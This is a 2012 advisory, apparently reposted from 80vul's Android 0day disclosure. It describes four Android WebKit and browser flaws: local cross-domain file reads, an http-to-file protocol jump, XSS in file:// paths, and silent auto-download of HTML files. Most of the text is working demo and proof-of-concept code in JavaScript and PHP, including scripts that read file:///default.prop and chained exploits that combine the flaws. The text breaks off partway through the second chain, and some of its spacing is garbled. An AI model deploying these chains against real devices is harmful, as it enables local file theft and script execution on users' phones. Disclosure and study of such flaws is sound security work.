Android webkit XSS cross-domain Auto-Download vulnerability-vulnerability warning-the black bar safety net

2012-02-10T00:00:00
ID MYHACK58:62201233071
Type myhack58
Reporter 佚名
Modified 2012-02-10T00:00:00

Description

Android Multiple Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]

Release Date: 2012/2/8

References: http://www.80vul.com/android/android-0days.txt

Ph4nt0m Webzine 0x06 has been

released[http://www.80vul.com/webzine_0x06/],there

three papers on the android application security about the development

environment,browser security, inter-application communication. And published

a lot of 0days:

[0day-NO. 0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local

file. demo:

<script>

var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');

}

} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP',

'Microsoft. XMLHTTP',

'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0',

'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i<versions. length; i++) {

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

//xmlhttp. open("GET", "file:///// default. prop", false);

//xmlhttp. open("GET", "http://www.80vul.com/", false);

xmlhttp. send(null);

var ret = xmlhttp. responseText;

alert(ret);

</script>

[0day-NO. 1] android-webkit, cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>

<script>

function init(){

f. location = "file:///default. prop";

}

setTimeout(init,5 0 0 0)

</script>

location.php codz:

<? php

header("Location:file:///80vul. com");

?& gt;

[0day-NO. 2] The android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory

and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul. com/<script>alert(1);</script>

[0day-NO. 3] android-browser/firefox auto download the file vulnerability

android-browser/firefox to Handle the Content-Disposition: attachment, lack of

safety tips. So through this vul allows users to automatically download the

evil html file to the local directory.

test this code:

<?

//autodown.php

header("Content-Disposition: attachment:filename=autodown.htm");

$data=<<<android_xss_go

<script>alert(/xss/);</script>

android_xss_go;

print $data;

?& gt;

the local file name and the path:

android 1. x - > /sdcard/download/autodown.html

android 2. x-3. x - > /sdcard/download/autodown.htm

android 4.0 - > /sdcard/download/autodown.php

firefox --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

POC[1]:

//[0day-NO. 1]+[0day-NO. 2]

<iframe name=f src="location.php" ></iframe>

<script>

function init(){

f. location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";

}

setTimeout(init,5 0 0 0)

</script>

POC[2]:

//[0day-NO. 1]+[0day-NO. 3]

[1] [2] [3] next